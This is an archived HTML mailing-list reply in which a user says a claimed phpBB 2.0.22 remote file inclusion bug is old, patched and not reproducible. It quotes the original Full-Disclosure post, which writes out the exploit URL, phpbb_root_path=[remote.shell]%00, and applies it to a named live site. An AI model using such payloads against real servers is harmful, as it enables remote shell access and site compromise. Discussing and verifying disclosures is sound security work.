<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 TRANSITIONAL//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=UTF-8">
<META NAME="GENERATOR" CONTENT="GtkHTML/3.14.1">
</HEAD>
<BODY>
AFAIK this is a very old bug and has been fixed in all modules?<BR>
I've tested your vuln against a few installs of phpBB and can't reproduce it... so seems it's been patched allready?<BR>
<BR>
<A HREF="http://archives.neohapsis.com/archives/vuln-dev/2002-q1/0981.html">http://archives.neohapsis.com/archives/vuln-dev/2002-q1/0981.html</A><BR>
<BR>
Regards,<BR>
Jeroen<BR>
<BR>
-------- --------<BR>
<B>From</B>: <A HREF="mailto:dr.rezen@gmail.com">dr.rezen@gmail.com</A><BR>
<B>To</B>: <A HREF="mailto:full-disclosure@lists.grok.org.uk">full-disclosure@lists.grok.org.uk</A><BR>
<B>Subject</B>: [Full-disclosure] 0DAY RFI in phpBB <= 2.0.22 HOT<BR>
<B>Date</B>: Fri, 01 Jun 2007 13:05:01 -0400<BR>
<BR>
<PRE>
New bug found in phpBB, most pages vulnerable, theres more bugs, I\'ll post one a week:
victim/phpBB2/includes/functions_post.php?phpbb_root_path=[remote.shell]%00
For example:
<A HREF="http://www.phpbb.de/includes/functions_post.php?phpbb_root_path=[remote.shell]%00">http://www.phpbb.de/includes/functions_post.php?phpbb_root_path=[remote.shell]%00</A>
Enjoy :)
BUG BY REZEN! XORCREW! H4X H4X!
_______________________________________________
Full-Disclosure - We believe in it.
Charter: <A HREF="http://lists.grok.org.uk/full-disclosure-charter.html">http://lists.grok.org.uk/full-disclosure-charter.html</A>
Hosted and sponsored by Secunia - <A HREF="http://secunia.com/">http://secunia.com/</A>
</PRE>
</BODY>
</HTML>